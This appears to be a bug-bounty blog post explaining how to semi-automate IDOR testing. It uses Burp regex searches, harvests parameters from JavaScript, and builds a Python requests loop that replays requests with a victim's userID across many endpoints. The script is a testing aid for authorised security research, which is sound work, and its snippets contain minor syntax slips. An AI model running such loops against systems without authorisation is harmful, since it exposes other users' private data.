Semi-Automating IDORs: A Practical Approach to Working Smarter, Not Harder
Assalamu alaikum wa rahmatullahi wa barakatuh Folks,
imma talk today about how do I try to automate IDORs sometimes to save some time and earn more money
Lets get to the action part
First, you cant do this process without having an idea about how your target is creating the IDs for the parameters for users,videos,blogs, everything, How it process these IDs, like is it sending it in a cookie value? a POST parameter? GET parameter? JWT token in authorization header? an ascii hex? maybe encrypted userID ? a GUID v1 or v4?
Second, identify the endpoints that take/accept the ID we were able to identify, so for example lets assume that there’s a parameter called userID
we’re trying to hack :p, we need all endpoints that have used it from our burp project, we will use regexes :D, so if our target is using our parameter in json object in POST request, we will use this regex for example
HTTP/2\r\n.*"userID":
this regex will look for all POST requests with parameter userID
in it
and for sure you might want to look for endpoint in the javascript, by identifying how the developer is calling the userID
in his code, he maybe using user_id
, how would you know? search for an endpoint you know for sure its using the userID
parameter in the javascript file and see the code that is responsible for setting the request data, then search for the parameter “the developer is calling” in all javascript files and collect the endpoints that use it, and if the userID
parameter is a urlencoded parameter in GET request you should look for it in wayback machine too, and google dorks ‘consider it as a home work’
now its time for using our most valuable tool OUR BRAIN
Third, we have to collect all required parameter used in our requests to prevent some errors to happen, and false positives
from our burp search results press
ctrl/command + A -> right click -> uncheck save as base64 encoded -> save
make a regex to grab the required parameters too “consider it as a home work” so if its in a regex request body, make a regex that matches "string":anything till comma or }
, if your dealing with regexes regularly it would be fun for you, if you’re not just practice more, or get some help from GPT, i use it alot
you should be having something like this for example
"param1":"value"
"param2":"value"
"param3":"value"
"param1":"value"
you would definitely want to remove duplicates, using sublime i do this
now, its a pure scripting phase using python, you can use your favorite scripting language
after having all requests/endpoints that have our parameter userID
we should be having a list like
/endpoint/users
/endpoint/users/bookings
/endpoint/users/reminders
/endpoint/users/passwords
so we need to turn them into a python list, open your fav code editor, i’ll be using sublime text
replace regex ^
with "
and $
with ",
as in here
now, you’ll only have to add the brackets to make it a list [
before first endpoint and ]
after last endpoint
so it should be like
[
"/endpoint/users",
"/endpoint/users/bookings",
"/endpoint/users/reminders",
"/endpoint/users/passwords"
]
now we need the cookies and headers to used them in our script, i use this burp extension copy as python-requests
import requests
burp0_url = "<url>"
burp0_cookies = {"_csrfSecret": "7SzZ2udqHWCNBTlsQKoFyNsU", other cookies}
burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/118.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate, br", "Content-Type": "application/json", "X-Csrf-Token": "AAhWIM7F3eoSJIhgCTV4xthJk1ar12ovTBeArj4F", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Te": "trailers"}
burp0_json={"userID": "1698912852405"}
requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, json=burp0_json)
please note that
you can use this method to
- select all request and copy them all, and match parameters instead of saving the requests to file
2. select all urls from it instead of burp but you will need to remove burp\n_
from the variable name, so you are able to match them all using url = .*
, and you’ll have to add comma at the end of the lines to have a list, you get what i wanna tell you right? regexes is your friend in automation :D
for our flow, we’ll just need the cookies and headers, because we matched the endpoints before, now we just need a lil if condition to know the success result
after understanding how your target is responding to all types of requests you should be able to identify unauthorized request
, unauthenticated requrst
,and errors requests, every web application is responding differently depends on its configuration, i mean you may get 200 OK
status code but in its response its telling you you're unauthorized to do this action
, so make the if statement suits your target, for example i may make it like
if 'unauthorized` not in r.text:
print(f"{URL}" passed!")
now its time to combine things together :D
- import requests lib
- add the list of urls we’ve collected in a variable
urls
- loop in the URLs list so in every loop it sends a request to a URL with data, headers, and cookies DONT FORGET TO REPLACE THE
userID
parameter with the victim’s one “your second account for testing” - the if statement inside the loop to check if the request has been sent successfully
import requests
urls = [
"/endpoint/users",
"/endpoint/users/bookings",
"/endpoint/users/reminders",
"/endpoint/users/passwords"
]
cookies = {
"_csrfSecret": "7SzZ2udqHWCNBTlsQKoFyNsU",
other cookies
}
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/118.0",
"Accept": "*/*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate, br",
"Content-Type": "application/json",
"X-Csrf-Token": "AAhWIM7F3eoSJIhgCTV4xthJk1ar12ovTBeArj4F",
"Sec-Fetch-Dest": "empty",
"Sec-Fetch-Mode": "cors",
"Sec-Fetch-Site": "same-origin",
"Te": "trailers"
}
datajson = {
"userID": victimUserID,
"param1":"value1",
"param2":"value2",
"param3":"value3"
}
for url in urls:
# sending post request
response = requests.post(url, headers=headers, cookies=cookies, json=datajson)
# handling response
if 'unauthorized' not in response.text:
print(f"{url} VULNERABLE TO IDOR, can you confirm it?")
Some notes
- you will need to improvise sometimes to collect the parameters and play around with regexes to match what you want
- you should have used a burp project from day 0 of hacking your target because it stored every request you sent, so it will have alot of endpoints there to grab the parameters from it
feel free to ask/contact me if you want ;)
my twitter account https://x.com/mux0x